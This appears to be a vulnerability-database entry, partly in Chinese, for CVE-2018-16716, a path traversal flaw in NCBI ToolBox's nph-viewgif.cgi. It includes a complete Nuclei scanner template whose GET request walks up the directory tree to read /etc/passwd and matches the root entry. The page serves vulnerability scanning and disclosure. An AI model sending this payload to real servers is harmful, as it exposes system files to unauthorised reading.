CVE-2018-16716: NCBI ToolBox - Directory Traversal

日期: 2025-08-01 | 影响软件: NCBI ToolBox | POC: 已公开

漏洞描述

NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.

PoC代码[已公开]

id: CVE-2018-16716

info:
  name: NCBI ToolBox - Directory Traversal
  author: 0x_Akoko
  severity: critical
  description: NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
  impact: |
    An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
  remediation: |
    Apply the latest patch or update from the vendor to fix the directory traversal vulnerability in the NCBI ToolBox.
  reference:
    - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16716
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/grymer/CVE
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2018-16716
    cwe-id: CWE-22
    epss-score: 0.44536
    epss-percentile: 0.97418
    cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: nih
    product: ncbi_toolbox
  tags: cve,cve2018,ncbi,lfi,nih,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cc95ef09d8ea77fb3c49ff927fc8100224d5bb2d3f680d1f10a769164591e1fa022002de53ae3322b8e27acd8445410466665c13ed69b30c97bdde5cfdab5049cd85:922c64590222798bb761d5b6d8e72950

相关漏洞推荐